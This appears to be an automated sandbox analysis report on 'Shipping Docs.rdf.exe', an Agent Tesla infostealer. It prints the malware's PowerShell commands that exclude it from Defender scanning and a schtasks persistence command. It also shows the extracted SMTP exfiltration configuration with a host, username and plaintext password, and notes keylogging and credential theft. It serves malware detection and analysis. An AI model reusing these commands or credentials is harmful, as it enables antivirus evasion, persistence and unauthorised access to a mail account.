Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Docs.rdf.exe", ParentImage: C:\Users\user\Desktop\Shipping Docs.rdf.exe, ParentProcessId: 1664, ParentProcessName: Shipping Docs.rdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe", ProcessId: 6480, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7216, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmpF63B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmpF63B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Docs.rdf.exe", ParentImage: C:\Users\user\Desktop\Shipping Docs.rdf.exe, ParentProcessId: 1664, ParentProcessName: Shipping Docs.rdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmpF63B.tmp", ProcessId: 5844, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 10.2.SVcPIbJno.exe.3c7d130.10.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.parsdarou.ir", "Username": "secretariat@parsdarou.ir", "Password": "wvnz2aV[mpkyjlSut-rciofxq8sdhg"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Virustotal: Detection: 43%			Perma Link

Multi AV Scanner detection for submitted file

Source: Shipping Docs.rdf.exe	Virustotal: Detection: 43%			Perma Link
Source: Shipping Docs.rdf.exe	ReversingLabs: Detection: 31%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Shipping Docs.rdf.exe

Joe Sandbox ML: detected

Source: Shipping Docs.rdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Shipping Docs.rdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegSvcs.pdb, source: boqXv.exe, 00000018.00000000.1334932054.0000000000872000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr
Source:	Binary string: RegSvcs.pdb source: boqXv.exe, 00000018.00000000.1334932054.0000000000872000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.42768e0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.7:49704 -> 5.144.130.49:587

Source: Joe Sandbox View

ASN Name: HOSTIRAN-NETWORKIR HOSTIRAN-NETWORKIR

Source: global traffic

TCP traffic: 192.168.2.7:49704 -> 5.144.130.49:587

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: mail.parsdarou.ir

Source: Shipping Docs.rdf.exe, SVcPIbJno.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Shipping Docs.rdf.exe, SVcPIbJno.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: svchost.exe, 00000008.00000002.2450570227.000001E66B000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.8.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: RegSvcs.exe, 00000009.00000002.1245608119.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2448473771.00000000030DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.parsdarou.ir
Source: Shipping Docs.rdf.exe, SVcPIbJno.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: RegSvcs.exe, 0000000E.00000002.2448473771.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2455852920.0000000006330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0g
Source: RegSvcs.exe, 0000000E.00000002.2448473771.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2455852920.0000000006330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: Shipping Docs.rdf.exe, 00000000.00000002.1227838638.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, SVcPIbJno.exe, 0000000A.00000002.1268003499.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 0000000E.00000002.2455852920.000000000637A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.t.co
Source: RegSvcs.exe, 0000000E.00000002.2448473771.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2455852920.0000000006330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: RegSvcs.exe, 0000000E.00000002.2448473771.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2455852920.0000000006330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Shipping Docs.rdf.exe, 00000000.00000002.1229585940.000000000423B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1241904701.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SVcPIbJno.exe, 0000000A.00000002.1282453180.0000000003C7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000008.00000003.1207491337.000001E66AF20000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: qmgr.db.8.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: Shipping Docs.rdf.exe, SVcPIbJno.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack, 3DlgK9re6m.cs	.Net Code: ctoC4ahG
Source: 0.2.Shipping Docs.rdf.exe.42768e0.7.raw.unpack, 3DlgK9re6m.cs	.Net Code: ctoC4ahG

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.SVcPIbJno.exe.3cb8150.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Shipping Docs.rdf.exe.42768e0.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.SVcPIbJno.exe.3c7d130.10.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.SVcPIbJno.exe.3cb8150.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.SVcPIbJno.exe.3c7d130.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Shipping Docs.rdf.exe.42768e0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Code function: 0_2_015BD5BC	0_2_015BD5BC
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Code function: 0_2_0733AF68	0_2_0733AF68
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Code function: 0_2_07332610	0_2_07332610
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Code function: 0_2_07333568	0_2_07333568
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Code function: 0_2_073355F0	0_2_073355F0
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Code function: 0_2_07333130	0_2_07333130
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Code function: 0_2_07333111	0_2_07333111
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Code function: 0_2_073351B8	0_2_073351B8
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Code function: 0_2_073351A7	0_2_073351A7
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Code function: 0_2_073339A0	0_2_073339A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02D54AC8	9_2_02D54AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02D53EB0	9_2_02D53EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02D541F8	9_2_02D541F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02D5D747	9_2_02D5D747
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02D5CF4D	9_2_02D5CF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02D5BD8C	9_2_02D5BD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_06423268	9_2_06423268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_064242A8	9_2_064242A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_06420040	9_2_06420040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0642C050	9_2_0642C050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0642E060	9_2_0642E060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_06429E20	9_2_06429E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_06428ED2	9_2_06428ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_06425A30	9_2_06425A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_06425350	9_2_06425350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0642399F	9_2_0642399F
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_00E3D5BC	10_2_00E3D5BC
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06D3061A	10_2_06D3061A
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06D30628	10_2_06D30628
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06D3CA50	10_2_06D3CA50
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06D37370	10_2_06D37370
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06D3B0C8	10_2_06D3B0C8
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06D309B0	10_2_06D309B0
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06D309A2	10_2_06D309A2
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06DAA23B	10_2_06DAA23B
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06DA2610	10_2_06DA2610
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06DA55F0	10_2_06DA55F0
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06DA3568	10_2_06DA3568
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06DA51B8	10_2_06DA51B8
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06DA39A0	10_2_06DA39A0
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06DA51A7	10_2_06DA51A7
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Code function: 10_2_06DA3130	10_2_06DA3130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_02E6D650	14_2_02E6D650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_02E6A490	14_2_02E6A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_02E64AC8	14_2_02E64AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_02E69810	14_2_02E69810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_02E63EB0	14_2_02E63EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_02E641F8	14_2_02E641F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066AA068	14_2_066AA068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066AB900	14_2_066AB900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066D3268	14_2_066D3268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066D42A8	14_2_066D42A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066D0040	14_2_066D0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066DE058	14_2_066DE058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066DC050	14_2_066DC050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066D9E20	14_2_066D9E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066D8ED2	14_2_066D8ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066D5A30	14_2_066D5A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066D5350	14_2_066D5350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_066D39B0	14_2_066D39B0

Source: Shipping Docs.rdf.exe

Static PE information: invalid certificate

Source: Shipping Docs.rdf.exe, 00000000.00000002.1229585940.000000000423B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename68e7e580-9894-45bf-a1e9-f80bdc1d5917.exe4 vs Shipping Docs.rdf.exe
Source: Shipping Docs.rdf.exe, 00000000.00000002.1229585940.000000000423B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Shipping Docs.rdf.exe
Source: Shipping Docs.rdf.exe, 00000000.00000002.1227838638.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename68e7e580-9894-45bf-a1e9-f80bdc1d5917.exe4 vs Shipping Docs.rdf.exe
Source: Shipping Docs.rdf.exe, 00000000.00000002.1231778715.0000000007630000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Shipping Docs.rdf.exe
Source: Shipping Docs.rdf.exe, 00000000.00000002.1225476521.000000000102E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Shipping Docs.rdf.exe
Source: Shipping Docs.rdf.exe	Binary or memory string: OriginalFilenamevHRNl.exe4 vs Shipping Docs.rdf.exe

Source: Shipping Docs.rdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.2.SVcPIbJno.exe.3cb8150.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Shipping Docs.rdf.exe.42768e0.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.SVcPIbJno.exe.3c7d130.10.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.SVcPIbJno.exe.3cb8150.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.SVcPIbJno.exe.3c7d130.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Shipping Docs.rdf.exe.42768e0.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: Shipping Docs.rdf.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SVcPIbJno.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Shipping Docs.rdf.exe.2fac5ec.3.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Shipping Docs.rdf.exe.2fac5ec.3.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Shipping Docs.rdf.exe.5740000.8.raw.unpack, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Shipping Docs.rdf.exe.5740000.8.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Shipping Docs.rdf.exe.5740000.8.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack, slKb.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack, mAKJ.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack, xQRSe0Fg.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'

Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, IKR7ckwsAeW2I8WSmF.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, IKR7ckwsAeW2I8WSmF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, IKR7ckwsAeW2I8WSmF.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Shipping Docs.rdf.exe.43514d0.4.raw.unpack, kSFcfoxpqapMq8vniP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, kSFcfoxpqapMq8vniP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, IKR7ckwsAeW2I8WSmF.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, IKR7ckwsAeW2I8WSmF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Shipping Docs.rdf.exe.7630000.11.raw.unpack, IKR7ckwsAeW2I8WSmF.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/23@1/2

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe

File created: C:\Users\user\AppData\Roaming\SVcPIbJno.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Mutant created: \Sessions\1\BaseNamedObjects\qondEeZwLeuxpKEThIayRRlXfal
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_03

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe

File created: C:\Users\user\AppData\Local\Temp\tmpF63B.tmp

Jump to behavior

Source: Shipping Docs.rdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Shipping Docs.rdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Shipping Docs.rdf.exe	Virustotal: Detection: 43%
Source: Shipping Docs.rdf.exe	ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe

File read: C:\Users\user\Desktop\Shipping Docs.rdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Shipping Docs.rdf.exe "C:\Users\user\Desktop\Shipping Docs.rdf.exe"
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SVcPIbJno.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmpF63B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
